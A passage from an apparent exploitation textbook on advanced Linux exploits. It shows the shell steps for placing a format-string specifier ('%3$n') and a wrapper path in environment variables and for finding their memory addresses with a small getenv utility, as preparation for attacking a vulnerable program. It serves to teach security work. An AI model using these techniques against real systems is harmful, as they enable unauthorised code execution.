Exit anyway? (y or n) y
BT book $
We will use the environment section of memory to store our strings and retrieve their
location with our handy get_env.c utility.
BT book $ cat get_env.c
//getenv.c
#include
int main(int argc, char *argv[]){
char * addr; //simple string to hold our input in bss section
addr = getenv(argv[1]); //initialize the addr var with input
printf("%s is located at %p\n", argv[1], addr);//display location
}
Chapter 8: Advanced Linux Exploits
191
PART III
Remember that the get_env program needs to be the same size as the vulnerable program,
in this case vuln2 (5 chars).
BT book $ gcc -o gtenv get_env.c
Okay, we are ready to place the strings into memory and retrieve their locations.
BT book $ export FMTSTR="%3\$n" //escape the $ with a backslash
BT book $ echo $FMTSTR
%3$n
BT book $ ./gtenv FMTSTR
FMTSTR is located at 0xbffffde5
BT book $
BT book $ export WRAPPER="./wrapper"
BT book $ echo $WRAPPER
./wrapper
BT book $ ./gtenv WRAPPER
WRAPPER is located at 0xbffffe02
BT book $
We have everything except the location of the last memory slot of our buffer. To determine
this value, first we find the size of the vulnerable buffer. With this simple program,
we only have one internal buffer, which will be located at the top of the stack when
inside the vulnerable function (main).
Pages:
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376